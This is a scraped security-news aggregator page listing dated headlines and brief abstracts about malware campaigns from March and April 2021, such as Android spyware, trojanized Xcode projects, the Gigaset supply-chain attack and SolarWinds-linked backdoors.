The North Korean-backed Lazarus hacking group used new malware with backdoor capabilities dubbed Vyveva by ESET researchers in targeted attacks against a South African freight logistics company.BleepingComputer
April 8, 2021
Fake Trezor App Steals Cryptocurrency Worth Over $1 Million From Users Full Text
Abstract
According to the Washington Post, the fake Trezor app, which was on the App Store for at least two weeks (from 22 January to 3 February), was downloaded 1,000 times before it was taken down.Malwarebytes Labs
April 8, 2021
BazarCall Trojan: A Malware Backed by Call Centers Full Text
Abstract
Security experts are reporting about the distribution of BazarCall malware via fake call centers. Under the aforementioned campaign, threat actors trick users into installing the Windows malware.Cyware Alerts - Hacker News
April 8, 2021
IcedID - A New Threat In Office Attachments Full Text
Abstract
The specific Excel document used in the recent wave of attacks is using XLM macros to download and execute its payload. The latest update also saw a major change in its first stage loading mechanism.Minerva Labs
April 7, 2021
Fake Netflix App on Google Play Spreads Malware Via WhatsApp Full Text
Abstract
The wormable malware spread from Android to Android by sending messages offering free Netflix Premium for 60 days.Threatpost
April 07, 2021
Gigaset Android phones infected by malware via hacked update server Full Text
Abstract
Owners of Gigaset Android phones have been repeatedly infected with malware since the end of March after threat actors compromised the vendor's update server in a supply-chain attack.BleepingComputer
April 7, 2021
Aurora campaign: Attacking Azerbaijan using multiple RATs Full Text
Abstract
The malicious document targets the government of Azerbaijan using a SOCAR letter template as a phishing lure. SOCAR is the name of Azerbaijan’s Republic Oil and Gas Company.Malwarebytes Labs
April 07, 2021
WhatsApp-based wormable Android malware spotted on the Google Play Store Full Text
Abstract
Cybersecurity researchers have discovered yet another piece of wormable Android malware—but this time downloadable directly from the official Google Play Store—that's capable of propagating via WhatsApp messages. Disguised as a rogue Netflix app under the name of "FlixOnline," the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server. "The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server," Check Point researchers said in an analysis published today. Besides masquerading as a Netflix app, the malicious "FlixOnline" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gain access toThe Hacker News
April 07, 2021
Android malware infects wannabe Netflix thieves via WhatsApp Full Text
Abstract
Newly discovered Android malware found on Google's Play Store disguised as a Netflix tool is designed to auto-spread to other devices using WhatsApp auto-replies to incoming messages.BleepingComputer
April 7, 2021
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
A new supply chain attack made the headlines, threat actors compromised at least one update server of smartphone maker Gigaset to deliver malware. The German device maker Gigaset was the victim of supply chain attack, threat actors compromised at least...Security Affairs
April 7, 2021
Wormable Netflix Malware Spreads Via WhatsApp Messages Full Text
Abstract
Check Point says threat is designed to phish for log-ins and card detailsInfosecurity Magazine
April 07, 2021
Pre-Installed Malware Dropper Found On German Gigaset Android Phones Full Text
Abstract
In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app. "The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui , which is a pre-installed system app," Malwarebytes researcher Nathan Collier said . "This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone." The development was first reported by German author and blogger Günter Born last week. While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+. According to Malwarebytes, the Update app installsThe Hacker News
April 06, 2021
Experts uncover a new Banking Trojan targeting Latin American users Full Text
Abstract
Researchers on Tuesday revealed details of a new banking trojan targeting corporate users in Brazil at least since 2019 across various sectors such as engineering, healthcare, retail, manufacturing, finance, transportation, and government. Dubbed " Janeleiro " by Slovak cybersecurity firm ESET, the malware aims to disguise its true intent via lookalike pop-up windows that are designed to resemble the websites of some of the biggest banks in the country, including Itaú Unibanco, Santander, Banco do Brasil, Caixa Econômica Federal, and Banco Bradesco. "These pop-ups contain fake forms, aiming to trick the malware's victims into entering their banking credentials and personal information that the malware captures and exfiltrates to its [command-and-control] servers," ESET researchers Facundo Muñoz and Matías Porolli said in a write-up. This modus operandi is not new to banking trojans. In August 2020, ESET uncovered a Latin American (LATAM) banking trojan callThe Hacker News
April 6, 2021
New Janeleiro Banking Trojan Strikes Companies, Government Agencies in Brazil Full Text
Abstract
A banking Trojan striking corporate targets across Brazil has been unmasked by researchers. On Tuesday, ESET published an advisory on the malware, which has been in development since 2018.ZDNet
April 06, 2021
Hackers Targeting professionals With ‘more_eggs’ Malware via LinkedIn Job Offers Full Text
Abstract
A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called "more_eggs." To increase the odds of success, the phishing lures take advantage of malicious ZIP archive files that have the same name as that of the victims' job titles taken from their LinkedIn profiles. "For example, if the LinkedIn member's job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position (note the 'position' added to the end)," cybersecurity firm eSentire's Threat Response Unit (TRU) said in an analysis. "Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs." Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdoThe Hacker News
April 5, 2021
Poulight Trojan: A “txt file” can steal all your secrets Full Text
Abstract
The Poulight Trojan has been put into use since last year and has complete and powerful functions to steal information. This attack proved that it has begun to spread and use overseas.360 Total Security
April 4, 2021
Beware – Hackers Using Call of Duty Cheats to Deliver Sophisticated Malware Full Text
Abstract
The video gaming industry is a popular target for various threat actors. Players, as well as studios and publishers themselves, are at...Cyber Security News
April 4, 2021
Malware attack on Applus blocked vehicle inspections in some US states Full Text
Abstract
A malware attack against vehicle inspection services provider Applus Technologies paralyzed preventing vehicle inspections in eight US states. Applus Technologies is a worldwide leader in the testing, inspection and certification sector, the company...Security Affairs
April 03, 2021
Malware attack is preventing car inspections in eight US states Full Text
Abstract
A malware cyberattack on emissions testing company Applus Technologies is preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin.BleepingComputer
April 3, 2021
Activision warns of Call of Duty Cheat tool used to deliver RAT Full Text
Abstract
The popular video game publisher Activision is warning gamers that threat actors are actively disguising a remote-access trojan (RAT) in Duty Cheat cheat tool. Activision, the company behind Call of Duty: Warzone and Guitar Hero series, is warning...Security Affairs
April 2, 2021
Call of Duty Cheats Expose Gamers to Malware, Takeover Full Text
Abstract
Activision is warning that cyberattackers are disguising malware — a remote-access trojan (RAT) — in cheat programs.Threatpost
April 2, 2021
From PowerShell to Payload: An Analysis of Weaponized Malware Full Text
Abstract
John Hammond, security researcher with Huntress, takes a deep-dive into a malware’s technical and coding aspects.Threatpost
April 2, 2021
Android “System Update” malware steals photos, videos, GPS location Full Text
Abstract
A newly discovered piece of Android malware shares the same capabilities found within many modern stalkerware-type apps—it can swipe images and video, rifle through online searches, record phone calls, and video, and peer into GPS location data.Malwarebytes Labs
April 2, 2021
Beware – Hackers Using Gaming mods and Cheat Engines to Deliver Malware Full Text
Abstract
Cisco Talos recently revealed a new campaign targeting video game players and other PC modders. They detected a new cryptor used in...Cyber Security News
April 1, 2021
Fileless Malware Growth Beats All Other Odds in 2020 Full Text
Abstract
According to a report by Watchguard Technologies, in 2020, the use of fileless malware increased rapidly as cybercriminals tried to find new ways to evade traditional security controls.Cyware Alerts - Hacker News
April 1, 2021 12
Video game cheat mod malware demonstrates risks of unlicensed software Full Text
Abstract
Hacking campaign trojanizes cheat mods that PC gamers may be downloading and installing on their work computers.SCMagazine
April 1, 2021
Activision Reveals Malware Disguised as ‘Call of Duty: Warzone’ Cheats Full Text
Abstract
Activision security researchers found that a Warzone cheat advertised on popular cheating forums was actually malware that let hackers take control of the victims' computers.Motherboard Vice
March 31, 2021
BazarCall malware uses malicious call centers to infect victims Full Text
Abstract
For the past two months, security researchers have been waging an online battle against a new 'BazarCall' malware that uses call centers to distribute some of the most damaging Windows malware.BleepingComputer
March 31, 2021
Hundreds of Fleeceware Apps Earning Millions of Dollars Full Text
Abstract
Avast researchers have found a total of 204 fleeceware apps on both Apple and Google stores which have earned an estimated over $400 million to date for their developers.Cyware Alerts - Hacker News
March 31, 2021
Malware hidden in game cheats and mods used to target gamers Full Text
Abstract
Threat actors target gamers with backdoored game tweaks, patches, and cheats hiding malware capable of stealing information from infected systems.BleepingComputer
March 31, 2021
Docker Hub Image that Downloaded Over 20 Million Times Come with Cryptominers Full Text
Abstract
Malicious Docker Hub containers infect 20 million with cryptomining malware. Aviv Sasson, part of the Palo Alto Networks threat intelligence team, Unit...Cyber Security News
March 30, 2021
Malicious Docker Cryptomining Images Rack Up 20M Downloads Full Text
Abstract
Publicly available cloud images are spreading Monero-mining malware to unsuspecting cloud developers.Threatpost
March 30, 2021
New Android Malware Spotted Posing as System Update Full Text
Abstract
This RAT abuses Accessibility Services to gain access to instant messenger apps. Moreover, if the victim device is rooted, the spyware can collect database records too.Cyware Alerts - Hacker News
March 30, 2021
Fileless Malware Detections Soar 900% in 2020 Full Text
Abstract
Attackers continue to look for ways to evade detectionInfosecurity Magazine
March 29, 2021
Docker Hub images downloaded 20M times come with cryptominers Full Text
Abstract
Researchers found that more than two-dozen containers on Docker Hub have been downloaded more than 20 million times for cryptojacking operations spanning at least two years.BleepingComputer
March 29, 2021
Rise of Linux Malware, Spoofing, and COVID-19 Full Text
Abstract
Based on insights and observations from monitoring over 150 billion security events per day in more than 130 countries, IBM's new report underlines top trends from the last year.Cyware Alerts - Hacker News
March 29, 2021
PHP Infiltrated with Backdoor Malware Full Text
Abstract
The server for the web-application scripting language was compromised on Sunday.Threatpost
March 29, 2021
New Advanced Android Malware Poses as “System Update” to Steal Messages, Images and Taking Control of Android Phones Full Text
Abstract
Zimperium zLabs researchers revealed unsecured cloud configurations exposing information in thousands of legitimate iOS and Android apps. zLabs is warning Android users...Cyber Security News
March 29, 2021
A new Android spyware masquerades as a ‘system update’ Full Text
Abstract
The spyware can steal messages, contacts, device details, browser bookmarks and search history, record calls and ambient sound from the microphone, and take photos using the phone’s cameras.TechCrunch
March 29, 2021
New Purple Fox version includes Rootkit and implements wormable propagation Full Text
Abstract
Researchers from Guardicore have spotted a new variant of the Purple Fox Windows malware that implements worm-like propagation capabilities. Researchers from Guardicore have discovered a new version of the Purple Fox Windows malware that implements...Security Affairs
March 27, 2021
Experts spotted a new advanced Android spyware posing as “System Update” Full Text
Abstract
Researchers spotted a sophisticated Android spyware that implements exfiltration capabilities and surveillance features, including recording audio and phone calls. Experts from security firm Zimperium have spotted a new sophisticated Android spyware...Security Affairs
March 27, 2021
New Android malware spies on you while posing as a System Update Full Text
Abstract
New malware with extensive spyware capabilities steals data from infected Android devices and is designed to automatically trigger whenever new info is read to be exfiltrated.BleepingComputer
March 26, 2021
Trickbot Malware Is Now Spreading Via Phishing Emails Full Text
Abstract
As per a joint statement of the FBI and the CISA, one of the most widespread and powerful forms of malware, Trickbot malware, is now being used in spear-phishing campaigns in an attempt to infect PCs.Heimdal Security
March 25, 2021
Trojanized Xcode Project Spreads MacOS Malware Full Text
Abstract
A new threat identified as XcodeSpy has emerged to target macOS users. The malware spies on Mac users of Xcode IDE by delivering the EggShell backdoor.Cyware Alerts - Hacker News
March 25, 2021
Data Loss Impacts 40% of SaaS App Users Full Text
Abstract
Survey of SaaS users finds 40% have lost data stored in online toolsInfosecurity Magazine
March 25, 2021
Honeywell Says Malware Disrupted IT Systems Full Text
Abstract
The company said the intrusion was detected “recently” and only a “limited number” of IT systems were disrupted. No other information has been provided regarding the impact.Security Week
March 24, 2021
Purple Fox Malware Targets Windows Machines With New Worm Capabilities Full Text
Abstract
A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.Threatpost
March 23, 2021
Purple Fox Rootkit Can Now Spread Itself to Other Windows Computers Full Text
Abstract
Purple Fox , a Windows malware previously known for infecting machines by using exploit kits and phishing emails, has now added a new technique to its arsenal that gives it worm-like propagation capabilities. The ongoing campaign makes use of a "novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes," according to Guardicore researchers , who say the attacks have spiked by about 600% since May 2020. A total of 90,000 incidents have been spotted through the rest of 2020 and the beginning of 2021. First discovered in March 2018, Purple Fox is distributed in the form of malicious ".msi" payloads hosted on nearly 2,000 compromised Windows servers that, in turn, download and execute a component with rootkit capabilities , which enables the threat actors to hide the malware on the machine and make it easy to evade detection. Guardicore says Purple Fox hasn't changed much post-exploitatThe Hacker News
March 23, 2021
Purple Fox malware worms its way into exposed Windows systems Full Text
Abstract
Purple Fox, a malware previously distributed via exploit kits and phishing emails, has now added a worm module that allows it to scan for and infect Windows systems reachable over the Internet in ongoing attacks.BleepingComputer
March 23, 2021
Attackers Are Developing and Using Entire New Breeds Of Malware Full Text
Abstract
A new report by HP revealed that about 88% of malware threats detected were delivered to victims via email, whereas there were a quarter of unseen threats in Q4 2020.Cyware Alerts - Hacker News
March 23, 2021
Researchers Discover Two Dozen Malicious Chrome Extensions Full Text
Abstract
Researchers discovered two dozen Google Chrome browser extensions and 40 associated malicious domains that are being used to inject adware, steal credentials, or redirect victims to malicious sites.Dark Reading
March 22, 2021
A New Account-stealing Malware Targets Global Tech Giants Full Text
Abstract
Giants like Amazon, Apple, Facebook, and Google, among other services, are now prone to attack by a new piece of malware called CopperStealer that is lurking in cracked software downloads available on pirated-content sites.Cyware Alerts - Hacker News
March 21, 2021
Let’s Talk About NimzaLoader, the New Malware in Town Full Text
Abstract
This malware has been written in the Nim language to evade detection. The campaign has been attributed to the TA800 threat actor, who previously propagated the BazaLoader malware.Cyware Alerts - Hacker News
March 20, 2021
iOS app developers targeted with trojanized Xcode project Full Text
Abstract
The script contacts a C&C server and downloads a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence, and allows the attacker to record information from the victim’s microphone, camera, and keyboard.Help Net Security
March 19, 2021
Russian National pleads guilty to conspiracy to plant malware on Tesla systems Full Text
Abstract
The Russian national who attempted to convince a Tesla employee to plant malware on Tesla systems has pleaded guilty. The U.S. Justice Department announced on Thursday that the Russian national Egor Igorevich Kriuchkov (27), who attempted to convince...Security Affairs
March 19, 2021
CopperStealer malware infected up to 5,000 hosts per day over first three months of 2021 Full Text
Abstract
The malware stole credentials of users on major platforms including Facebook, Instagram, Apple, Amazon, Bing, Google, PayPal, Tumblr and Twitter.SCMagazine
March 19, 2021
ESET Exposes Malware Disguised as Clubhouse App Full Text
Abstract
The malware can steal login information for 458 online servicesInfosecurity Magazine
March 19, 2021
BlackRock Android trojan Poses as Clubhouse App to Steal Login Credentials for Over 450 Apps Full Text
Abstract
Disguised as the (non-existent) Android version of the invitation-only audio chat app, the malicious package is served from a website that has the look and feel of the genuine Clubhouse website.ESET Security
March 19, 2021
Hackers Infecting Apple App Developers With Trojanized Xcode Projects Full Text
Abstract
Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks. Dubbed "XcodeSpy," the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction. "XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism," SentinelOne researchers said . Xcode is Apple's integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS. Earlier this year, Google's Threat Analysis group uncovered a North Korean campaign aimed at security researcheThe Hacker News
March 18, 2021
XcodeSpy Mac malware targets Xcode Developers with a backdoor Full Text
Abstract
Unknown threat actors have been using a new XcodeSpy Mac malware to target software developers who use Apple’s Xcode integrated development environment. Researchers at SentinelOne uncovered a series of attacks involving a new XcodeSpy used to deliver...Security Affairs
March 18, 2021
New CopperStealer malware steals Google, Apple, Facebook accounts Full Text
Abstract
Previously undocumented account-stealing malware distributed via fake software crack sites targets the users of major service providers, including Google, Facebook, Amazon, and Apple.BleepingComputer
March 18, 2021
Mekotio Tojan is Using AutoHotKey to Avoid Detection Full Text
Abstract
The Mekotio trojan has been found using two separate emails as an initial infection vector which then abuses AutoHotKey (AHK) and the AHK compiler to steal users’ information.Cyware Alerts - Hacker News
March 18, 2021
How to Successfully Pursue a Career in Malware Analysis Full Text
Abstract
Are you looking to becoming a malware analyst? Then continue reading to discover how to gain the training you need and start a career in malware analysis career. Did you know that new malware is released every seven seconds? As more and more systems become reliant on the internet, the proliferation of malware becomes increasingly destructive. Once upon a time, a computer virus might cause considerable inconvenience, but its reach might have been limited to the handful of systems connected to the internet. Today, with every home, factory, and institution online, it's theoretically possible for malware to shut down an entire nation. That's where malware analysis comes in. Malware analysis is the process of isolating and reverse-engineering malicious software. Malware analysts draw on a wide range of skills, from programming to digital forensics, to identify and understand different types of malware. From there, they can design security solutions to protect computers from simThe Hacker News
March 18, 2021
Apple developers targeted by malicious Xcode project Full Text
Abstract
The backdoor is able to record the victim’s microphone, camera and keyboard entries, plus can upload and download files.SCMagazine
March 18, 2021
Trojanized Xcode Project Slips MacOS Malware to Apple Developers Full Text
Abstract
In a new campaign, threat actors are bundling macOS malware in trojanized Apple Xcode developer projects.Threatpost
March 18, 2021
US taxpayers targeted with RAT malware in ongoing phishing attacks Full Text
Abstract
US taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.BleepingComputer
March 18, 2021
New XcodeSpy malware targets iOS devs in supply-chain attack Full Text
Abstract
A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply-chain attack to install a macOS backdoor on the developer's computer.BleepingComputer
March 18, 2021
Expert found a 1-Click RCE in the TikTok App for Android Full Text
Abstract
Egyptian security researcher Sayed Abdelhafiz discovered multiple bugs in TikTok Android Application that can be chained to achieve Remote code execution. Egyptian security researcher Sayed Abdelhafiz discovered multiple vulnerabilities in the TikTok...Security Affairs
March 18, 2021
Old RAT in New Theme Full Text
Abstract
Trustwave researchers have spotted a new malspam campaign that is exploiting icon files to deceive victims into executing the NanoCore RAT.Cyware Alerts - Hacker News
March 18, 2021
Fake Telegram Desktop App Malware Campaign Persists Full Text
Abstract
The .com and .net sites have seen 2,746 downloads of the malicious Windows executable, and a second-stage malware was then pushed down 129 times. The .org site snared 529 downloads in just two days.Info Risk Today
March 17, 2021
New Mirai Variant Targeting IoT & Network Security Devices Full Text
Abstract
Unit 42 researchers observed a new Mirai variant targeting IoT and network security devices. They discovered attacks leveraging several vulnerabilities, including:Cyber Security News
March 17, 2021
$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware Full Text
Abstract
The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.Threatpost
March 16, 2021
New Mirai variant appears in the threat landscape Full Text
Abstract
Palo Alto researchers uncovered a series of ongoing attacks to spread a variant of the infamous Mirai bot exploiting multiple vulnerabilities. Security experts at Palo Alto Networks disclosed a series of attacks aimed at delivering a Mirai variant...Security Affairs
March 16, 2021
Mimecast: SolarWinds hackers used Sunburst malware for initial intrusion Full Text
Abstract
Email security company Mimecast has confirmed today that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion.BleepingComputer
March 16, 2021
Threatening within Budget: How WSH-RAT is abused by Cyber-Crooks Full Text
Abstract
WSH-RAT kit is a complete Remote Administration tool sold in the underground and frequently abused by criminal actors relying on off-the-shelf kits to build their offensive campaigns.Yoroi
March 16, 2021
Taurus Stealer’s Evolution Full Text
Abstract
The individuals developing this threat have been actively improving the evasiveness of their loader since February 2021, which in turn made their payloads fully undetectable for almost a month.Minerva Labs
March 15, 2021
School district IT leaders grade their handling of past malware attacks Full Text
Abstract
Rockford Public Schools and Rockingham County Schools learned lessons in transparency, timely incident response, access management, data redundancy and disaster recovery.SCMagazine
March 15, 2021
Metamorfo Banking Trojan Leverages AutoHotKey (AHK) and the AHK compiler to Evade Detection Full Text
Abstract
A legitimate binary for creating shortcut keys in Windows is being used to help the malware sneak past defenses, in a rash...Cyber Security News
March 13, 2021
New variant for Mac Malware XCSSET compiled for M1 Chips Full Text
Abstract
Kaspersky researchers spotted a new variant of the XCSSET Mac malware that compiled for devices running on Apple M1 chips. XCSSET is a Mac malware that was discovered by Trend Micro in August 2020, it was spreading through Xcode projects and exploits...Security Affairs
March 12, 2021
NimzaLoader Malware Developed Using a Rare Programming Language to Avoid Detection Full Text
Abstract
The research team from Proofpoint observed an interesting email campaign by a threat actor and tracked it as ‘TA800’. The TA800 threat...Cyber Security News
March 12, 2021
Researchers Spotted Malware Written in Nim Programming Language Full Text
Abstract
Cybersecurity researchers have unwrapped an "interesting email campaign" undertaken by a threat actor that has taken to distributing a new malware written in Nim programming language. Dubbed " NimzaLoader " by Proofpoint researchers, the development marks one of the rare instances of Nim malware discovered in the threat landscape. "Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim's implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it," the researchers said. Proofpoint is tracking the operators of the campaign under the moniker "TA800," who, they say, started distributing NimzaLoader starting February 3, 2021. Prior to the latest raft of activity, TA800 is known to have predominantly used BazaLoader since April 2020. While APT28 has been previously linked to delivering ZebThe Hacker News
March 12, 2021
Clast82: A Dropper That Delivers Two Banking Trojans Full Text
Abstract
Check Point Research laid out details on financial trojans found embedded in at least ten Android-based apps by the same threat actor. The apps have been taken down by Google.Cyware Alerts - Hacker News
March 12, 2021
Microsoft Exchange exploits now used by cryptomining malware Full Text
Abstract
The operators of Lemon_Duck, a cryptomining botnet that targets enterprise networks, are now using Microsoft Exchange ProxyLogon exploits in attacks against unpatched servers.BleepingComputer
March 12, 2021
Malspam campaign uses icon files to delivers NanoCore RAT Full Text
Abstract
Researchers at Trustwave spotted a new malspam campaign that is abusing icon files to trick victims into installing the NanoCore Trojan. Researchers at Trustwave have spoted a new malspam campaign that is abusing icon files to trick victims...Security Affairs
March 11, 2021
FIN8 Resurfaces with Revamped Backdoor Malware Full Text
Abstract
The financial cyber-gang is running limited attacks ahead of broader offensives on point-of-sale systems.Threatpost
March 11, 2021
Chinese state hackers target Linux systems with new malware Full Text
Abstract
Security researchers at Intezer have discovered a previously undocumented backdoor dubbed RedXOR, with links to a Chinese-sponsored hacking group and used in ongoing attacks targeting Linux systems.BleepingComputer
March 11, 2021
Malware Operator Employs New Trick to Upload Its Dropper into Google Play Full Text
Abstract
Researchers at Check Point recently discovered that the operator of a mobile malware tool was employing a novel new method to sneak its malware into Google's official Android Play mobile app store.Dark Reading
March 10, 2021
Researchers Unveil New Linux Malware Linked to Chinese Hackers Full Text
Abstract
Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that's believed to be the work of Chinese nation-state actors. Dubbed " RedXOR " by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog. RedXOR's name comes from the fact that it encodes its network data with a scheme based on XOR, and that it's compiled with a legacy GCC compiler on an old release of Red Hat Enterprise Linux, suggesting that the malware is deployed in targeted attacks against legacy Linux systems. Intezer said two samples of the malware were uploaded from Indonesia and Taiwan around Feb. 23-24, both countries that are known to be singled out by China-based threat groups. Aside from the overlaps in terms of the overall flow and functionalities and thThe Hacker News
March 10, 2021
New malware tied to China targets Linux endpoints and servers Full Text
Abstract
The malware, called RedXOR because it was compiled on Red Hat Enterprise Linux and uses a network data encoding scheme based on XOR, creates a backdoor in systems that gives an attacker near full control over infected machines.SCMagazine
March 10, 2021
There’s Something We Don’t Talk Enough About - Mobile Malware Full Text
Abstract
The Ewind adware family totaled 65% of all adware samples, with FakeAdBlocker and HiddenAd right at its heels. Almost 2 million Ewind.kp Android installer packages were hidden in legitimate apps.Cyware Alerts - Hacker News
March 10, 2021
FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware Full Text
Abstract
Threat actors known for keeping a low profile do so by ceasing operations for prolonged periods in between to evade attracting any attention as well as constantly refining their toolsets to fly below the radar of many detection technologies. One such group is FIN8 , a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution . First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems. "The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report publishedThe Hacker News
March 10, 2021
ZLoader Malware Hidden in Encrypted Excel File Full Text
Abstract
The ZLoader payload is a multipurpose Trojan that often acts as a dropper that delivers Zeus-based malware in multistage ransomware attacks, such as Ryuk and Egregor, a Forcepoint X-Labs report notes.Gov Info Security
March 9, 2021
Google Play Harbors Malware-Laced Apps Delivering Spy Trojans Full Text
Abstract
A never-before-seen malware-dropper, Clast82, fetches the AlienBot and MRAT malware in a savvy Google Play campaign aimed at Android users.Threatpost
March 9, 2021
Ursnif Trojan Terrorizes Banks Full Text
Abstract
Avast has found at least 100 banks in Italy being targeted by the Ursnif banking trojan. Researchers also found over 1,700 stolen credentials linked to a single payment processor.Cyware Alerts - Hacker News
March 09, 2021
9 Android Apps On Google Play Caught Distributing AlienBot Banker and MRAT Malware Full Text
Abstract
Cybersecurity researchers have discovered a new malware dropper contained in as many as 9 Android apps distributed via Google Play Store that deploys a second stage malware capable of gaining intrusive access to the financial accounts of victims as well as full control of their devices. "This dropper, dubbed Clast82, utilizes a series of techniques to avoid detection by Google Play Protect detection, completes the evaluation period successfully, and changes the payload dropped from a non-malicious payload to the AlienBot Banker and MRAT," Check Point researchers Aviran Hazum, Bohdan Melnykov, and Israel Wernik said in a write-up published today. The apps that were used for the campaign include Cake VPN, Pacific VPN, eVPN, BeatPlayer, QR/Barcode Scanner MAX, Music Player, tooltipnatorlibrary, and QRecorder. After the findings were reported to Google on January 28, the rogue apps were removed from the Play Store on February 9. Malware authors have resorted to a variety oThe Hacker News
March 9, 2021
Supernova Malware Analysis Links Chinese Threat Group Spiral to SolarWinds Server Hacks Full Text
Abstract
According to researchers, the CVE-2020-10148 authentication bypass vulnerability, which leads to the remote execution of API commands, in the SolarWinds Orion API has been exploited by Spiral.ZDNet
March 9, 2021
10 Google Play Apps Found Containing Banking Malware Full Text
Abstract
Malicious dropper also loaded RAT onto victim devicesInfosecurity Magazine
March 9, 2021
FluBot Android Malware Impersonates FedEx, DHL, Correos, Chrome Apps to Steal User Data Full Text
Abstract
FluBot infects Android devices by appearing as FedEx, DHL, Correos, and Chrome apps and forces users to change Accessibility settings so that it could maintain persistence on the device.Hackread
March 9, 2021
SUPERNOVA backdoor that emerged after SolarWinds hack is likely linked to Chinese actors Full Text
Abstract
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks Supernova malware spotted on compromised SolarWinds Orion installs exposed on the Internets is likely linked to a China-linked espionage group. Researchers at Secureworks'...Security Affairs
March 08, 2021
Hackers hiding Supernova malware in SolarWinds Orion linked to China Full Text
Abstract
Intrusion activity related to the Supernova malware planted on compromised SolarWinds Orion installations exposed on the public internet points to an espionage threat actor based in China.BleepingComputer
March 08, 2021
Malware Can Exploit New Flaw in Intel CPUs to Launch Side-Channel Attacks Full Text
Abstract
A new research has yielded yet another means to pilfer sensitive data by exploiting what's the first "on-chip, cross-core" side-channel in Intel Coffee Lake and Skylake processors. Published by a group of academics from the University of Illinois at Urbana-Champaign, the findings are expected to be presented at the USENIX Security Symposium coming this August. While information leakage attacks targeting the CPU microarchitecture have been previously demonstrated to break the isolation between user applications and the operating system, allowing a malicious program to access memory used by other programs (e.g., Meltdown and Spectre), the new attack leverages a contention on the ring interconnect. SoC Ring interconnect is an on-die bus arranged in a ring topology which enables intra-process communication between different components (aka agents) such as the cores, the last level cache (LLC), the graphics unit, and the system agent that are housed inside the CPU. EacThe Hacker News
March 8, 2021
SolarWinds just keeps getting worse: New strain of malware found infecting victims Full Text
Abstract
The malware strain, identified as SUNSHUTTLE by boffins at security shop FireEye, is a backdoor attack written in Go which uses HTTPS to communicate with a command-and-control server for data exfiltration, adding new code as needed.The Register
March 8, 2021
Intel CPU interconnects can be exploited by malware to leak encryption keys and other info, academic study finds Full Text
Abstract
This was tested on Intel Coffee Lake and Skylake CPUs, client-class CPUs, and should work on server CPUs like Xeon Broadwell. It's unknown whether more recent Intel server chips are susceptible.The Register
March 5, 2021
WordPress Injection Anchors Widespread Malware Campaign Full Text
Abstract
Website admins should patch all plugins, WordPress itself and back-end servers as soon as possible.Threatpost
March 5, 2021
GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers Full Text
Abstract
Microsoft experts continue to investigate the SolarWinds attack and spotted 3 new strains of malware used as second-stage payloads. Microsoft announced the discovery of three new pieces of malware that the threat actors behind the SolarWinds attack,...Security Affairs
March 5, 2021
Ryuk Further Expands its Reach - Gets Worm-Like Capabilities Full Text
Abstract
With CERT-FR warning that Ryuk now has worm-like capabilities, attackers can now more quickly spread the malware inside a network. Earlier, it could only target one system at a time.Cyware Alerts - Hacker News
March 5, 2021
ObliqueRAT Learns Steganography Full Text
Abstract
Cyberattackers behind ObliqueRAT campaigns are now disguising the trojan in benign image files on hijacked websites. Four new versions of the malware have been recently discovered.Cyware Alerts - Hacker News
March 5, 2021
Stalkerware - A Nuisance Growing at Steady Pace Full Text
Abstract
Nidb family was the prominent stalkerware, impacting around 8,100 users around the world. This stalkerware-as-a-service was used to sell multiple products, such as iSpyoo, Copy9, and TheTruthSpy.Cyware Alerts - Hacker News
March 05, 2021
Researchers Find 3 New Malware Strains Used by SolarWinds Hackers Full Text
Abstract
